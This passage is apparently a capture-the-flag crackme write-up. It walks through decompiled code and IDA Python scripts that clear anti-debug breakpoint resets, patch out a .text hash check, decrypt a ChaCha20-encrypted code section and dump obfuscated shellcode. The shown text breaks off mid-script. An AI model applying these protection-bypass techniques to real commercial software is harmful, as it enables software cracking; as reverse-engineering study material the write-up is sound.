For the check part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// Check handler: reads the text of dialog item 1006, validates it with
// sub_4030A5 and shows a dialog built from resource 134 when the check returns
// non-zero, or from resource 136 otherwise.
unsigned int __usercall sub_405399@<eax>(int a1@<ecx>, int a2@<ebx>)
{
memset(input_, 0, sizeof(input_));
// At most 255 characters are copied into the zeroed input_ buffer.
GetDlgItemTextA(*(HWND *)(a1 + 8), 1006, input_, 255);
if ( sub_4030A5(*(_DWORD **)(a1 + 20), a2, (int)input_) )
{
// Accepted input: the text is processed further and passed to dialog 134
// (presumably the success dialog; confirm).
sub_4025EC(Src_1, input_);
sub_40268B(v16, (int)Src_1);
sub_405724((int)Src_1);
sub_402876(Src, (int)v17);
hInstance = *(HINSTANCE *)(a1 + 4);
sub_40515A(&v6, Src);
sub_40574D(dwInitParam, hInstance, 134, v6, v7, v8, v9, v10, v11);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
sub_4057DA(dwInitParam);
sub_405724((int)Src);
return sub_402781(v16);
}
else
{
// Rejected input: dialog 136 (presumably the "try again" window; confirm).
hInstance_1 = *(HINSTANCE *)(a1 + 4);
sub_4025EC(&v6, &unk_40B3CE);
sub_40574D(dwInitParam, hInstance_1, 136, v6, v7, v8, v9, v10, v11);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
return sub_4057DA(dwInitParam);
}
}

The sub_4030A5 is the input processing function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// Input-processing routine: returns 0 for a null input. Otherwise it runs the
// code in the .pc section (loc_40A000 / byte_40A025) between a sub_4046C8 /
// sub_404732 pair and returns that code's verdict.
char __userpurge sub_4030A5@<al>(int *a1@<ecx>, int a2@<ebx>, int input)
{
if ( !input )
return 0;
v5 = sub_40448C();
// Per the write-up, exceptions 0x80000003 and 0x80000004 are raised in here.
sub_4046C8((int)v5, *a1, a1[1], a1[2], a1[3]);
// 0x14 bytes = the five dwords zeroed below.
v6 = sub_408AAA(0x14u);
if ( v6 )
{
*v6 = 0;
v6[1] = 0;
v6[2] = 0;
v6[3] = 0;
v6[4] = 0;
// Enters the .pc section at 0x40A000.
v7 = (void *)((int (*)(void))loc_40A000)();
}
else
{
v7 = 0;
}
n20 = 20;
// The actual check: a __thiscall routine at byte_40A025, called with the input.
v8 = (*(int (__thiscall **)(void *, int, int))byte_40A025)(v7, input, a2);
sub_408ADA(v7);
v9 = sub_40448C();
sub_404732((int)v9);
return v8;
}

In sub_4046C8, exception 0x80000003 is triggered once and 0x80000004 several times. Next, execution reaches a custom section, .pc, at 0x40A000. This area is filled with illegal instructions and soon raises exception 0x80000001:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// Handler for exception 0x80000001. Always returns -1. Work is done only while
// the byte referenced through this+36 is non-zero.
int __thiscall Handler_0x80000001(int this, int a2, int a3)
{
if ( **(_BYTE **)(this + 36) )
{
sub_4037C9();
// NOTE(review): a2+16 / a2+20 look like EXCEPTION_RECORD.NumberParameters and
// ExceptionInformation[0], where 8 would denote an execute fault. Confirm
// against the Windows EXCEPTION_RECORD documentation.
if ( *(_DWORD *)(a2 + 16) )
{
n8 = *(_DWORD *)(a2 + 20);
if ( n8 < 2 )
{
sub_4037CD(**(_DWORD **)(this + 28), *(_DWORD *)(*(_DWORD *)(this + 28) + 8));
}
else if ( n8 == 8 )
{
v5 = a3;
// a3 + 184 is CONTEXT.Eip (per the write-up): the faulting address.
v6 = *(char **)(a3 + 184);
if ( sub_4044FA((_DWORD *)this, (unsigned int)v6) )
{
// Address accepted by sub_4044FA: remember it and run the decryption
// routine sub_40413B on it.
*(_DWORD *)(this + 60) = v6;
sub_40413B((void *)this, v5, v6);
}
else
{
// Otherwise only the debug-register reset in sub_4037FA runs.
sub_4037FA(&a3);
}
}
}
}
return -1;
}

a2 is the kind of exception, and a3 + 184 is CONTEXT.Eip. In sub_4037FA, a1 points to the DR (debug register) fields, and the function sets DR0, DR6 and DR7 to 0, which is equivalent to clearing all hardware breakpoints:

1
2
3
4
5
6
7
8
9
// Original version: zeroes three dwords of the structure *a1 points to, then
// sets bit 0x100 in the dword at offset 192.
int __stdcall sub_4037FA(int *a1)
{
// Offsets 24, 20 and 4 are DR7, DR6 and DR0 according to the write-up.
// Clearing them removes the debugger's hardware breakpoints.
*(_DWORD *)(*a1 + 24) = 0;
*(_DWORD *)(*a1 + 20) = 0;
*(_DWORD *)(*a1 + 4) = 0;
result = *a1;
// NOTE(review): with Eip at +184, +192 would be EFlags and 0x100 its trap
// flag (single-step). Confirm against the x86 CONTEXT layout.
*(_DWORD *)(*a1 + 192) |= 0x100u;
return result;
}

Patch to:

1
2
3
4
5
6
// Patched version: the three debug-register writes are removed so hardware
// breakpoints survive. The bit-0x100 update at offset 192 is kept.
int __stdcall sub_4037FA(int *a1)
{
result = *a1;
*(_DWORD *)(*a1 + 192) |= 0x100u;
return result;
}

At sub_40413B, there’s an algorithm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
// Decrypts the code at Src (sub_403FBA), passes the resulting pointer to
// sub_404684 together with &a2, and ends with the sub_4037FA register update.
int __thiscall sub_40413B(void *this, int a2, char *Src)
{
v3 = sub_403FBA((int)this, Src);
sub_404684((int)&a2, (int)v3);
return sub_4037FA(&a2);
}

// Produces the decrypted bytes for Src and returns the address where they now
// live: either a freshly obtained buffer or Src itself (decrypted in place).
char *__thiscall sub_403FBA(int this, char *Src)
{
sub_404286((int **)this);
sub_40464A((_DWORD *)this);
Src_1 = Src;
// v4 is a temporary copy of *this bytes from Src, decrypted by sub_404059.
v4 = sub_404059((size_t *)this, Src);
if ( sub_40477E((char *)v4) )
{
// NOTE(review): 12288 / 64 match MEM_COMMIT|MEM_RESERVE and
// PAGE_EXECUTE_READWRITE, so sub_40479C is presumably a VirtualAlloc-style
// wrapper. Confirm.
Src_2 = (char *)sub_40479C((_DWORD *)this, *(_DWORD *)(this + 4), 12288, 64);
*(_DWORD *)(this + 56) = Src_2;
Src = Src_2;
sub_403A69((int *)(this + 48), v7, &Src);
memcpy(*(void **)(this + 56), v4, *(_DWORD *)this);
Src_1 = *(char **)(this + 56);
}
else
{
// In-place path: the decrypted bytes overwrite the original location, and the
// offset relative to the base stored via this+28 is recorded.
memcpy(Src_1, v4, *(_DWORD *)this);
Src = &Src_1[-**(_DWORD **)(this + 28)];
sub_4039D4((int *)(this + 40), v7, &Src);
}
j_j_free_0(v4);
return Src_1;
}

// Copies *this bytes from Src into a new buffer and decrypts 0x10 bytes of it
// with the cipher the write-up identifies as a modified ChaCha20. The caller
// frees the returned buffer.
void *__thiscall sub_404059(size_t *this, char *Src)
{
v3 = sub_408AE8(*this);
memcpy(v3, Src, *this);
// Offset of Src relative to the base address stored via this[7].
v4 = &Src[-*(_DWORD *)this[7]];
// Two-dword value passed as the third argument of sub_401E39, which stores
// it in state words 14 and 15.
v10[0] = 0xD0C0B0A;
v10[1] = 0x11100F0E;
v5 = (char *)sub_403477();
v6 = sub_40330A(v5);
// Builds the cipher state from the key material v6 and the nonce, with both
// counter words set to 0.
sub_401E39(src_, (int)v6, (int)v10, 0, 0);
// NOTE(review): presumably positions the keystream at byte offset v4. Confirm.
sub_4022B8((int)src_, (unsigned int)v4);
sub_401F4D(src_, v7, (int)v3, 0x10u);
return v3;
}

// Cipher-state constructor: fills the 16 state words through sub_401E67, then
// overrides words 12 and 13 with a4 / a5 and sets this[32] to 64.
_DWORD *__thiscall sub_401E39(_DWORD *this, int a2, int a3, int a4, int a5)
{
sub_401E67(this, a2, a3);
this[12] = a4;
this[13] = a5;
this_1 = this;
// NOTE(review): 64 is the ChaCha block size; presumably this marks the
// keystream buffer as used up. Confirm.
this[32] = 64;
return this_1;
}

// Lays out the 16-word cipher state: words 0-3 come from the constants below,
// 4-11 from the eight dwords at a2, 12-13 are zeroed and 14-15 come from the two
// dwords at a3.
_DWORD *__thiscall sub_401E67(_DWORD *this, int a2, int a3)
{
// Four custom constant words (named key[] by the decompiler).
key[0] = 0xB979379E;
key[1] = 0x157C4A7F;
key[2] = 0x60C09CF3;
key[3] = 0x34C8ED5C;
*this = sub_402292(key);
this[1] = sub_402292(&key[1]);
this[2] = sub_402292(&key[2]);
this[3] = sub_402292(&key[3]);
// Per the write-up, a2 is the 8-dword array at 0x40D268 derived from the
// SHA-256 of the .text section.
this[4] = sub_402292(a2);
this[5] = sub_402292(a2 + 4);
this[6] = sub_402292(a2 + 8);
this[7] = sub_402292(a2 + 12);
this[8] = sub_402292(a2 + 16);
this[9] = sub_402292(a2 + 20);
this[10] = sub_402292(a2 + 24);
this[11] = sub_402292(a2 + 28);
this[12] = 0;
this[13] = 0;
this[14] = sub_402292(a3);
this[15] = sub_402292(a3 + 4);
return this;
}

The array a2 is 8 dwords at 0x40D268, generated from the SHA-256 hash of the program’s .text section. This means we can’t set software breakpoints or patch the program before the checksum has been computed. The correct checksum is F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2. After patching the checksum:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// Patched version: state words 4-11 are hard-coded instead of being read from
// a2, so the state no longer depends on the .text hash computed at run time.
_DWORD *__thiscall sub_401E67(_DWORD *this, int a2, int a3)
{
v5[0] = 0xB979379E;
v5[1] = 0x157C4A7F;
v5[2] = 0x60C09CF3;
v5[3] = 0x34C8ED5C;
*this = sub_402292(v5);
this[1] = sub_402292(&v5[1]);
this[2] = sub_402292(&v5[2]);
this[3] = sub_402292(&v5[3]);
// The correct checksum bytes from the write-up (F6 30 AA 38 ...), read as eight
// little-endian dwords.
this[4] = 0x38AA30F6;
this[5] = 0x379772D5;
this[6] = 0x5955645D;
this[7] = 0x50FD34C3;
this[8] = 0xD1A15CD5;
this[9] = 0x5A65D277;
this[10] = 0xCF512304;
this[11] = 0xF24B2469;
this[12] = 0;
this[13] = 0;
this[14] = sub_402292(a3);
this[15] = sub_402292(a3 + 4);
return this;
}

the program successfully shows the “try again” window. The self-decryption algorithm is a modified ChaCha20. To decrypt the .pc section:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import struct
from pathlib import Path

def rotl32(x, n):
    """Rotate ``x`` left by ``n`` bits inside a 32-bit word.

    Assumes ``0 <= x < 2**32`` and ``0 <= n <= 32``; the result is masked
    to 32 bits.
    """
    shifted_out = x >> (32 - n)
    shifted_up = x << n
    return (shifted_up | shifted_out) & 0xFFFFFFFF

def quarter_round(x, a, b, c, d):
    """Apply one ChaCha quarter round, in place, to words a, b, c, d of ``x``.

    Each of the four steps adds one word into another modulo 2**32, XORs
    the sum into a third word and rotates that word left.
    """
    # (accumulator, addend, word to mix, rotation amount)
    steps = ((a, b, d, 16), (c, d, b, 12), (a, b, d, 8), (c, d, b, 7))
    for acc, addend, target, amount in steps:
        x[acc] = (x[acc] + x[addend]) & 0xFFFFFFFF
        x[target] = rotl32(x[target] ^ x[acc], amount)

def chacha20_block(state16_words):
    """Compute one 64-byte keystream block from a 16-word state.

    Runs 10 double rounds (four column quarter rounds followed by four
    diagonal ones) on a copy of the state, adds the input state back word
    by word modulo 2**32 and serialises the result as little-endian dwords.
    The input list is not modified.
    """
    working = state16_words[:]
    columns = ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15))
    diagonals = ((0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14))
    for _ in range(10):
        for lanes in columns + diagonals:
            quarter_round(working, *lanes)
    mixed = [(working[i] + state16_words[i]) & 0xFFFFFFFF for i in range(16)]
    return struct.pack("<16I", *mixed)

def chacha20_xor(data_bytes, consts4, key8, nonce2, counter0=0, counter1=0):
    """XOR ``data_bytes`` with the keystream, 64 bytes per block.

    The state of each block is ``consts4 + key8 + [c0, c1] + nonce2``,
    where ``c0`` / ``c1`` are the low / high dwords of a 64-bit block
    counter that starts at ``counter0`` / ``counter1`` and grows by one per
    block.

    Returns:
        The transformed data as ``bytes``, same length as the input.
    """
    block_counter = ((counter1 & 0xFFFFFFFF) << 32) | (counter0 & 0xFFFFFFFF)
    pieces = bytearray()
    for start in range(0, len(data_bytes), 64):
        low = block_counter & 0xFFFFFFFF
        high = block_counter >> 32
        keystream = chacha20_block(consts4 + key8 + [low, high] + nonce2)
        segment = data_bytes[start:start + 64]
        pieces.extend(bytes(value ^ pad for value, pad in zip(segment, keystream)))
        # A carry out of the low dword bumps the high dword; the pair wraps
        # at 2**64.
        block_counter = (block_counter + 1) & 0xFFFFFFFFFFFFFFFF
    return bytes(pieces)

def extract_section(pe_path: Path, sec_name: str) -> bytes:
    """Return the raw on-disk bytes of the PE section named ``sec_name``.

    The section table is parsed by hand; the slice returned is
    ``PointerToRawData .. PointerToRawData + SizeOfRawData``.

    Raises:
        ValueError: if the file lacks the ``MZ`` or ``PE\\0\\0`` signature.
        KeyError: if no section carries that name.
    """
    image = pe_path.read_bytes()
    if not image.startswith(b"MZ"):
        raise ValueError("Not an MZ executable")

    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("Not a PE file")

    coff = pe_offset + 4
    (section_count,) = struct.unpack_from("<H", image, coff + 2)
    (optional_size,) = struct.unpack_from("<H", image, coff + 16)
    # The section table follows the 20-byte COFF header and optional header.
    table = coff + 20 + optional_size

    for header in range(table, table + 40 * section_count, 40):
        # Names are NUL-padded to 8 bytes.
        label = image[header:header + 8].split(b"\0", 1)[0].decode("ascii", "ignore")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, header + 8)
        if label == sec_name:
            return image[raw_ptr:raw_ptr + raw_size]
    raise KeyError(f"Section {sec_name!r} not found")

def main():
    """Decrypt the ``.pc`` section of ``Crackme.exe`` into ``pc_decrypted.bin``.

    The cipher parameters come from the patched state constructor shown in
    the write-up: four non-standard constant words, the eight key words
    taken from the ``.text`` checksum, a zero block counter and the
    two-word nonce.
    """
    const_words = [0xB979379E, 0x157C4A7F, 0x60C09CF3, 0x34C8ED5C]
    key_words = [
        0x38AA30F6, 0x379772D5, 0x5955645D, 0x50FD34C3,
        0xD1A15CD5, 0x5A65D277, 0xCF512304, 0xF24B2469,
    ]
    nonce_words = [0x0D0C0B0A, 0x11100F0E]
    counter_low, counter_high = 0, 0

    encrypted = extract_section(Path("Crackme.exe"), ".pc")
    decrypted = chacha20_xor(
        encrypted,
        const_words,
        key_words,
        nonce_words,
        counter0=counter_low,
        counter1=counter_high,
    )
    Path("pc_decrypted.bin").write_bytes(decrypted)
    print(f"[+] .pc size = {len(encrypted)} bytes")

# Script entry point.
if __name__ == "__main__":
main()

However, the decrypted shellcode is full of junk code and control-flow-flattening obfuscation, making it difficult to analyze.

To locate the decrypted function, look at sub_40413B after loc_40A000 has been called:

1
2
3
4
5
6
// Same routine as shown earlier. v3, returned by sub_403FBA, is the address of
// the freshly decrypted code.
int __thiscall sub_40413B(void *this, int a2, char *Src)
{
v3 = sub_403FBA((int)this, Src);
sub_404684((int)&a2, (int)v3);
return sub_4037FA(&a2);
}

v3 is the address of the decrypted function. The first function:

1
2
3
4
5
6
7
8
// First decrypted function of the .pc section: writes five constant dwords (the
// key, per the write-up) into the buffer it receives. The return statement is
// not shown in this reconstruction.
_DWORD *__fastcall sub_40A000(_DWORD *key)
{
key[0] = 0x865DBB47;
key[1] = 0x0A6EB190;
key[2] = 0x20476C33;
key[3] = 0x1C8A7693;
key[4] = 0x59FEBDFB;
}

It returns 5 dwords (the key). Debugging shows that the program decrypts 16 bytes of encrypted bytecode at a time and then executes only a single assembly instruction. The next decryption starts from the end of the previous instruction. With a breakpoint set at 0x404010 (just before the memcpy of the decrypted code), the decrypted code is located at *EBX. Dump the assembly code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import os
import struct
import idc
import ida_dbg
import ida_kernwin
import idaapi

# Address of the breakpoint at which the decrypted bytes are dumped.
BREAK_EA = 0x00404010
# File that receives the dumped records (opened in append mode by start()).
OUTPUT_PATH = r"E:\CTF\temp\dump.bin"
# Bytes read from the address in EBX on every hit.
READ_SIZE = 0x10
# Zero bytes appended after each read, so one record is READ_SIZE + PAD_SIZE bytes.
PAD_SIZE = 0x10
# Installed DumpHooks instance, or None while the dumper is not running.
g_hooks = None
# Open output file object, or None while the dumper is not running.
g_fp = None

def _execute_sync(fn):
    """Run ``fn`` through ``ida_kernwin.execute_sync``.

    If that call raises, ``fn`` is invoked directly instead, and any error
    from the direct call is swallowed (best effort).
    """
    try:
        ida_kernwin.execute_sync(fn, ida_kernwin.MFF_FAST)
        return
    except Exception:
        pass
    try:
        fn()
    except Exception:
        pass

def _read_mem(ea, size, tid=None):
    """Read ``size`` bytes of debuggee memory at ``ea``.

    Several read-call signatures are tried in turn; the first one that
    yields a truthy result wins. Exceptions from individual attempts are
    ignored.

    Returns:
        The bytes read, or ``None`` (after printing a message) when every
        attempt failed.
    """
    readers = [
        lambda: idaapi.dbg_read_memory(ea, size),
        lambda: ida_dbg.read_dbg_memory(ea, size),
    ]
    if tid is not None:
        readers.append(lambda: ida_dbg.read_dbg_memory(tid, ea, size))

    for reader in readers:
        try:
            got = reader()
            if got:
                return bytes(got)
        except Exception:
            pass

    # Last resort: the form that fills a caller-supplied buffer.
    try:
        scratch = bytearray(size)
        if ida_dbg.read_dbg_memory(ea, scratch, size):
            return bytes(scratch)
    except Exception:
        pass

    print(f"[dump] failed to read dbg memory @ 0x{ea:08X}, size=0x{size:X}")
    return None

def _dump_once(tid=None):
    """Append one record (memory at EBX plus zero padding) to the dump file.

    Reads ``READ_SIZE`` bytes from the address held in EBX, pads short
    reads with zeros, appends ``PAD_SIZE`` zero bytes and writes the record
    to ``g_fp``. Every failure is reported with a message and the hit is
    skipped.
    """
    global g_fp
    try:
        ebx = ida_dbg.get_reg_val("EBX")
    except Exception as e:
        print(f"[dump] get_reg_val(EBX) failed: {e}")
        return

    # Values below 0x10000 are not treated as a usable pointer.
    if ebx is None or ebx < 0x10000:
        shown = 0 if ebx is None else ebx
        print(f"[dump] EBX=0x{shown:08X} looks invalid, skip")
        return

    payload = _read_mem(ebx, READ_SIZE, tid=tid)
    if payload is None:
        print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{ebx:08X}")
        return

    record = payload.ljust(READ_SIZE, b"\x00") + bytes(PAD_SIZE)
    try:
        g_fp.write(record)
        g_fp.flush()
        print(f"[dump] hit 0x{BREAK_EA:08X} | EBX=0x{ebx:08X} | wrote {len(record)} bytes")
    except Exception as e:
        print(f"[dump] file write error: {e}")

def _continue():
    """Resume the debuggee.

    ``continue_process`` is tried first; if it raises,
    ``request_continue_process`` is tried, and a failure of that second
    call is only printed.
    """
    try:
        ida_dbg.continue_process()
    except Exception:
        try:
            ida_dbg.request_continue_process()
        except Exception as e:
            print(f"[dump] continue failed: {e}")

class DumpHooks(ida_dbg.DBG_Hooks):
    """Debugger hooks that dump memory at ``BREAK_EA`` and resume the debuggee."""

    def dbg_bpt(self, tid, ea):
        """Breakpoint callback: on ``BREAK_EA`` dump one record and continue.

        Always returns 0; exceptions are printed instead of propagated.
        """
        try:
            if ea == BREAK_EA:
                _dump_once(tid=tid)

                def _resume():
                    _continue()

                _execute_sync(_resume)
        except Exception as e:
            print(f"[dump] dbg_bpt exception: {e}")
        return 0

    def dbg_process_exit(self, pid, tid, ea, exit_code):
        """Process-exit callback: report the exit code and shut the dumper down."""
        print(f"[dump] process exit (code={exit_code}), stopping.")
        try:
            stop()
        except Exception:
            pass
        return 0

def start():
    """Open the dump file, arm the breakpoint at BREAK_EA and install DumpHooks.

    Does nothing but print a notice when hooks are already installed.

    Raises:
        Exception: whatever ``ida_dbg.add_bpt`` raised when both breakpoint
            APIs fail. The dump file is closed again before re-raising so a
            failed start does not leak the handle.
    """
    global g_hooks, g_fp
    if g_hooks is not None:
        print("[dump] already started")
        return

    os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)

    # A handle may be left over from an earlier start that did not finish.
    if g_fp is not None:
        try:
            g_fp.close()
        except Exception:
            pass
        g_fp = None
    g_fp = open(OUTPUT_PATH, "ab")

    try:
        idc.add_bpt(BREAK_EA)
        idc.enable_bpt(BREAK_EA, True)
    except Exception:
        try:
            ida_dbg.add_bpt(BREAK_EA)
        except Exception as e:
            print(f"[dump] add_bpt failed: {e}")
            # Release the file before propagating; hooks were never installed.
            try:
                g_fp.close()
            except Exception:
                pass
            g_fp = None
            raise

    g_hooks = DumpHooks()
    g_hooks.hook()
    print("[dump] started.")
    print(f" BREAK_EA = 0x{BREAK_EA:08X}")
    print(f" OUTPUT = {OUTPUT_PATH}")

def stop():
    """Remove the hooks, disable the BREAK_EA breakpoint and close the dump file.

    Every step is best effort: failures are swallowed so the remaining
    steps still run.
    """
    global g_hooks, g_fp

    installed = g_hooks
    if installed is not None:
        try:
            installed.unhook()
        except Exception:
            pass
        g_hooks = None

    try:
        idc.enable_bpt(BREAK_EA, False)
    except Exception:
        pass

    handle = g_fp
    if handle is not None:
        try:
            handle.flush()
            handle.close()
        except Exception:
            pass
        g_fp = None

    print("[dump] stopped.")

if __name__ == "__main__":
start()

Disassemble the shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# -*- coding: utf-8 -*-
import os
import idc
import idaapi
import ida_bytes
import ida_funcs
import ida_lines
import idautils

OUTPUT_PATH = r"E:\CTF\temp\trace.txt"
STEP = 0x40
TARGET_SEG_NAME = None

def pick_target_seg():
    """Choose the segment to process.

    Preference order: the segment named TARGET_SEG_NAME (when set and
    found), the segment containing address 0, then the segment with the
    lowest ``start_ea``. Returns ``None`` when there are no segments.
    """
    if TARGET_SEG_NAME:
        named = idaapi.get_segm_by_name(TARGET_SEG_NAME)
        if named:
            return named
        print(f"[trace] segment '{TARGET_SEG_NAME}' not found, fallback to auto-pick")

    at_zero = idaapi.getseg(0)
    if at_zero:
        return at_zero

    candidates = (idaapi.getseg(start) for start in idautils.Segments())
    return min((s for s in candidates if s), key=lambda s: s.start_ea, default=None)

def undefine_all(seg_start, seg_end):
    """Delete every function and every defined item in ``[seg_start, seg_end)``."""
    # Snapshot the function list first: it is modified while we delete.
    for func_ea in list(idautils.Functions(seg_start, seg_end)):
        try:
            ida_funcs.del_func(func_ea)
        except Exception:
            pass

    span = seg_end - seg_start
    try:
        ida_bytes.del_items(seg_start, ida_bytes.DELIT_EXPAND | ida_bytes.DELIT_SIMPLE, span)
    except Exception:
        # Retry without DELIT_EXPAND if the combined flags are rejected.
        ida_bytes.del_items(seg_start, ida_bytes.DELIT_SIMPLE, span)

def make_code_and_get_line(ea):
    """Create an instruction at ``ea`` and return its disassembly text.

    Returns the tag-stripped, whitespace-trimmed line, or ``None`` when no
    line can be generated even after waiting for auto-analysis.
    """
    try:
        idc.create_insn(ea)
    except Exception:
        pass

    text = idc.generate_disasm_line(ea, 0)
    if not text:
        # Give auto-analysis a chance to finish, then ask once more.
        try:
            idaapi.auto_wait()
        except Exception:
            pass
        text = idc.generate_disasm_line(ea, 0)
        if not text:
            return None

    try:
        text = ida_lines.tag_remove(text)
    except Exception:
        pass
    return text.strip()

def main():
    """Undefine the target segment, then write the first disassembly line of every STEP-sized slot to OUTPUT_PATH."""
    seg = pick_target_seg()
    if not seg:
        print("[trace] no segment found")
        return

    seg_start, seg_end = seg.start_ea, seg.end_ea
    print("[trace] target segment:")
    print(f" name = {idaapi.get_segm_name(seg)}")
    print(f" range = 0x{seg_start:08X} - 0x{seg_end:08X} (size=0x{seg_end-seg_start:X})")
    print(f" step = 0x{STEP:X}")
    print(f" out = {OUTPUT_PATH}")

    undefine_all(seg_start, seg_end)
    os.makedirs(os.path.dirname(OUTPUT_PATH), exist_ok=True)

    addrs = list(range(seg_start, seg_end, STEP))
    print(f"[trace] creating code & dumping first lines: {len(addrs)} entries ...")
    with open(OUTPUT_PATH, "w", encoding="utf-8", newline="\n") as fp:
        for ea in addrs:
            text = make_code_and_get_line(ea)
            shown = "<disasm failed>" if text is None else text
            fp.write(f"{ea:08X}: {shown}\n")
    print("[trace] done.")

if __name__ == "__main__":
main()

The trace shows that the shellcode accesses a SHA-256 hash, like the previous program hash. Setting breakpoints at advapi32_CryptCreateHash, advapi32_CryptHashData and advapi32_CryptGetHashParam shows that these functions are called at least dozens of times, and that each time they compute a hash of the .text section. Hook the hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import ida_dbg
import idaapi
import idc
import struct
import os

TEXT_BASE = 0x401000
TEXT_LEN = 0x8A00
PATCH_DST = 0x40D268
CRYPTSP_GHP_RET_EA_ABS = 0x720D50D2
CRYPT_HASHDATA_NAME_CANDIDATES = ["cryptsp_CryptHashData", "cryptsp.dll_CryptHashData", "CryptHashData"]
PATCH_BYTES = bytes.fromhex("F6 30 AA 38 D5 72 97 37 5D 64 55 59 C3 34 FD 50 D5 5C A1 D1 77 D2 65 5A 04 23 51 CF 69 24 4B F2")
g_hooks = None
g_hash_seen_text = set()

def _u32(x): return x & 0xFFFFFFFF

def dbg_read_mem(ea, n):
    """Read ``n`` bytes of debuggee memory at ``ea``.

    Returns ``bytes``, or ``None`` when the read yields nothing or raises.
    """
    try:
        raw = idaapi.dbg_read_memory(ea, n)
        if not raw:
            return None
        return bytes(raw)
    except Exception:
        return None

def dbg_write_mem(ea, data: bytes):
    """Write ``data`` to debuggee memory at ``ea``, trying three call forms in order.

    Returns the truthiness of the first call that does not raise, or
    ``False`` when all three raise.
    """
    writers = (
        lambda: idaapi.dbg_write_memory(ea, data),
        lambda: ida_dbg.write_dbg_memory(ea, data),
        lambda: ida_dbg.write_dbg_memory(ea, bytearray(data), len(data)),
    )
    for write in writers:
        try:
            return bool(write())
        except Exception:
            continue
    return False

def dbg_read_u32(ea):
    """Read a little-endian unsigned 32-bit value at ``ea``; ``None`` on a failed or short read."""
    raw = dbg_read_mem(ea, 4)
    if raw and len(raw) == 4:
        return int.from_bytes(raw, "little")
    return None

def dbg_write_u32(ea, v):
    """Write ``v`` (truncated to 32 bits) at ``ea`` as a little-endian dword; returns the write status."""
    packed = struct.pack("<I", _u32(v))
    return dbg_write_mem(ea, packed)

def is_in_text(pb, cb):
    """Return True when ``[pb, pb + cb)`` lies inside ``[TEXT_BASE, TEXT_BASE + TEXT_LEN]``.

    ``None`` for either argument yields False.
    """
    if pb is None or cb is None:
        return False
    text_end = TEXT_BASE + TEXT_LEN
    return TEXT_BASE <= pb and pb + cb <= text_end

def find_module_base(substr: str):
    """Return the base address of the first loaded module whose name contains ``substr``.

    The match is case-insensitive. Returns ``None`` when no module matches
    or the module list cannot be enumerated.

    The module list is walked with the ``modinfo_t``-based form of
    ``ida_dbg.get_first_module`` / ``get_next_module``. The original
    argument-less call form is kept as a fallback for builds that accept it;
    on builds that require a ``modinfo_t`` it raised and the function always
    returned ``None``.
    """
    needle = substr.lower()

    # Preferred form: the API fills a caller-supplied modinfo_t and returns a bool.
    try:
        import ida_idd
        info = ida_idd.modinfo_t()
        more = ida_dbg.get_first_module(info)
        while more:
            name = (getattr(info, "name", "") or "").lower()
            if needle in name:
                return int(getattr(info, "base", 0))
            more = ida_dbg.get_next_module(info)
        return None
    except Exception:
        pass

    # Fallback: the call form used originally (returns a module object).
    try:
        m = ida_dbg.get_first_module()
        while m:
            name = (getattr(m, "name", "") or "").lower()
            if needle in name:
                return int(getattr(m, "base", 0))
            m = ida_dbg.get_next_module(m)
    except Exception:
        pass
    return None

def resolve_ea_by_names(names):
    """Return the address of the first name in ``names`` that resolves, else ``None``.

    A result of ``idc.BADADDR`` or 0 counts as unresolved.
    """
    for candidate in names:
        ea = idc.get_name_ea_simple(candidate)
        if ea in (idc.BADADDR, 0):
            continue
        return ea
    return None

def add_bpt(ea):
